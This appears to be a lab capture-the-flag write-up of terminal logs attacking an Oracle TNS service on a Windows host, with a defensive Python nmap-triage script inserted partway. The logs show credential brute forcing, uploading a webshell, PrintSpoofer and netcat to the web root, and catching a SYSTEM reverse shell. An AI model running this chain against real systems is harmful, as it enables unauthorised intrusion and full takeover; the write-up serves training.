uzi@kali ~/D/06_Wordlists> nmap -n --min-rate 2000 -T4 -p- --max-retries 10 -Pn -sC -sV 10.129.196.225
Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-02 23:30 CST
Stats: 0:02:33 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 93.33% done; ETC: 23:33 (0:00:08 remaining)
Nmap scan report for 10.129.196.225
Host is up (0.23s latency).
Not shown: 65520 closed tcp ports (conn-refused)
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 8.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/8.5
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp  open  oracle-tns   Oracle TNS listener 11.2.0.2.0 (unauthorized)
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49159/tcp open  oracle-tns   Oracle TNS listener (requires service name)
49160/tcp open  msrpc        Microsoft Windows RPC
49161/tcp open  msrpc        Microsoft Windows RPC
49162/tcp open  msrpc        Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 176.69 seconds
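The scan above is the whole attack surface the rest of this writeup works from: an Oracle TNS listener on 1521, SMB, WinRM on 5985 and an IIS 8.5 site that answers TRACE. The following script is an added example, not part of the original writeup or of nmap: it parses nmap's normal (-sV/-sC) output into per-port records, attaches the NSE script lines to the port they belong to, and ranks the exposures a defender would want to review first. The sample scan text is a trimmed copy of the output shown above, and the ranking rules are this example's own heuristics.

```python
"""Triage nmap -sV/-sC normal output: parse the port table and NSE script
results, then flag services that deserve review. Added example, not from
the original writeup; the ranking rules are this script's own heuristics."""
import re
from dataclasses import dataclass, field

# Constructed sample: a trimmed copy of the scan output shown above.
SAMPLE_SCAN = """\
Nmap scan report for 10.129.196.225
Host is up (0.23s latency).
Not shown: 65520 closed tcp ports (conn-refused)
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 8.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/8.5
135/tcp   open  msrpc        Microsoft Windows RPC
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp  open  oracle-tns   Oracle TNS listener 11.2.0.2.0 (unauthorized)
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
49159/tcp open  oracle-tns   Oracle TNS listener (requires service name)
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
"""

# One port-table row: "80/tcp    open  http         Microsoft IIS httpd 8.5"
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")


@dataclass
class Service:
    port: int
    proto: str
    state: str
    name: str
    version: str
    scripts: list = field(default_factory=list)  # NSE lines, '|' prefix stripped


def parse_nmap(text):
    """Return Service entries; NSE output lines ('|' / '|_') are attached
    to the port row that precedes them, which is how nmap prints them."""
    services = []
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            port, proto, state, name, version = m.groups()
            services.append(Service(int(port), proto, state, name, version))
        elif line.startswith("|") and services:
            services[-1].scripts.append(line.lstrip("|_ ").strip())
    return services


def triage(services):
    """Map open services to (priority, port, note) tuples, lowest number
    first. The rules below are this example's own defensive heuristics."""
    findings = []
    for s in services:
        if s.state != "open":
            continue
        if s.name == "oracle-tns":
            findings.append((1, s.port, "Oracle TNS listener reachable: verify listener auth, "
                                        "locked default accounts and SYSDBA grants"))
        if s.name == "microsoft-ds":
            findings.append((1, s.port, "SMB exposed: restrict to management networks"))
        for sc in s.scripts:
            if sc.startswith("Potentially risky methods:"):
                methods = sc.split(":", 1)[1].strip()
                findings.append((2, s.port, f"HTTP method(s) {methods} enabled: disable via "
                                            "IIS request filtering"))
        if s.port == 5985:
            findings.append((2, s.port, "WinRM over HTTP: require HTTPS and restrict sources"))
        if s.name == "msrpc" and s.port >= 49152:
            findings.append((3, s.port, "Dynamic RPC endpoint exposed: filter at the perimeter"))
    return sorted(findings)


if __name__ == "__main__":
    for prio, port, note in triage(parse_nmap(SAMPLE_SCAN)):
        print(f"P{prio}  {port:>5}  {note}")
```

Feed it a saved `nmap -oN` file instead of the embedded sample to triage a real scan; the parser only relies on the port-table and NSE line layout, so it handles any number of hosts' worth of rows in sequence.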
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT    1521             yes       The target port (TCP)
   THREADS  1                yes       The number of concurrent threads (max one per host)
View the full module info with the info, or info -d command.
msf6 auxiliary(scanner/oracle/sid_enum) > set rhosts 10.129.95.188
rhosts => 10.129.95.188
msf6 auxiliary(scanner/oracle/sid_enum) > run
   Name              Current Setting                                           Required  Description
   ----              ---------------                                           --------  -----------
   BRUTEFORCE_SPEED  5                                                         yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false                                                     no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false                                                     no        Add all passwords in the current database to the list
   DB_ALL_USERS      false                                                     no        Add all users in the current database to the list
   DB_SKIP_EXISTING  none                                                      no        Skip existing credentials stored in the current database (Accepted: none, user, user&realm)
   RHOSTS                                                                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT             1521                                                      yes       The target port (TCP)
   SID                                                                         no        A specific SID to attempt.
   SID_FILE          /usr/share/metasploit-framework/data/wordlists/sid.txt   no        File containing instance names, one per line
   STOP_ON_SUCCESS   false                                                     yes       Stop guessing when a credential works for a host
   THREADS           1                                                         yes       The number of concurrent threads (max one per host)
   VERBOSE           true                                                      yes       Whether to print output for all attempts

View the full module info with the info, or info -d command.
[1] (10.129.95.188:1521): Searching valid accounts on the 10.129.95.188 server, port 1521
The login cis has already been tested at least once. What do you want to do:   | ETA:  00:21:01
- stop (s/S)
- continue and ask every time (a/A)
- skip and continue to ask (p/P)
- continue without to ask (c/C)
c
[!] Notice: 'ctxsys' account is locked, so skipping this username for password      | ETA:  00:21:39
[!] Notice: 'dbsnmp' account is locked, so skipping this username for password      | ETA:  00:20:50
[!] Notice: 'dip' account is locked, so skipping this username for password         | ETA:  00:19:44
[!] Notice: 'hr' account is locked, so skipping this username for password          | ETA:  00:16:47
[!] Notice: 'mdsys' account is locked, so skipping this username for password       | ETA:  00:12:51
[!] Notice: 'oracle_ocm' account is locked, so skipping this username for password  | ETA:  00:10:03
[!] Notice: 'outln' account is locked, so skipping this username for password       | ETA:  00:09:01
[+] Valid credentials found: scott/tiger. Continue...                               | ETA:  00:04:59
[!] Notice: 'system' account is locked, so skipping this username for password      | ETA:  00:03:59
[!] Notice: 'xdb' account is locked, so skipping this username for password#########| ETA:  00:00:59
100% |##################################################################################| Time: 00:24:45
[+] Accounts found on 10.129.95.188:1521/sid:XE:
scott/tiger
[1] (10.129.95.188:1521): Read the hosts file stored in C://windows/system32/drivers/etc on the 10.129.95.188 server
[+] Data stored in the hosts file stored in C://windows/system32/drivers/etc (copied in /tmp/hosts1 locally):
b"# Copyright (c) 1993-2009 Microsoft Corp.\n#\n# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.\n#\n# This file contains the mappings of IP addresses to host names. Each\n# entry should be kept on an individual line. The IP address should\n# be placed in the first column followed by the corresponding host name.\n# The IP address and the host name should be separated by at least one\n# space.\n#\n# Additionally, comments (such as these) may be inserted on individual\n# lines or following the machine name denoted by a '#' symbol.\n#\n# For example:\n#\n# 102.54.94.97 rhino.acme.com # source server\n# 38.25.63.10 x.acme.com # x client host\n\n# localhost name resolution is handled within DNS itself.\n#\t127.0.0.1 localhost\n#\t::1 localhost\n"

[1] (10.129.95.188:1521): Read the hosts file stored in C://windows/system32/drivers/etc on the 10.129.95.188 server
[-] Impossible to read the ['C://windows/system32/drivers/etc', 'hosts', '/tmp/hosts1'] file: `ORA-01031: insufficient privileges`
[1] (10.129.95.188:1521): Put the /usr/share/webshells/aspx/cmdasp.aspx local file in the C:\Inetpub\wwwroot folder like a.aspx on the 10.129.95.188 server
[+] The /usr/share/webshells/aspx/cmdasp.aspx file was created on the C:\Inetpub\wwwroot directory on the 10.129.95.188 server like the a.aspx file

[1] (10.129.95.188:1521): Put the /home/uzi/Documents/04_Privilege_Escalation/PrintSpoofer.exe local file in the C:\Inetpub\wwwroot folder like PrintSpoofer.exe on the 10.129.95.188 server
[+] The /home/uzi/Documents/04_Privilege_Escalation/PrintSpoofer.exe file was created on the C:\Inetpub\wwwroot directory on the 10.129.95.188 server like the PrintSpoofer.exe file

(venv) uzi@kali ~/D/0/odat (master-python3)> python ./odat.py utlfile -s 10.129.95.188 -U scott -P tiger -d XE --sysdba --putFile 'C:\Inetpub\wwwroot' nc64.exe /home/uzi/Documents/04_Privilege_Escalation/nc.exe/nc64.exe

[1] (10.129.95.188:1521): Put the /home/uzi/Documents/04_Privilege_Escalation/nc.exe/nc64.exe local file in the C:\Inetpub\wwwroot folder like nc64.exe on the 10.129.95.188 server
[+] The /home/uzi/Documents/04_Privilege_Escalation/nc.exe/nc64.exe file was created on the C:\Inetpub\wwwroot directory on the 10.129.95.188 server like the nc64.exe file
Local listening port:

uzi@kali ~/D/0/h/M/Silo> nc -lvnp 9002
Listening on 0.0.0.0 9002
Connection received on 10.129.95.188 49166
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system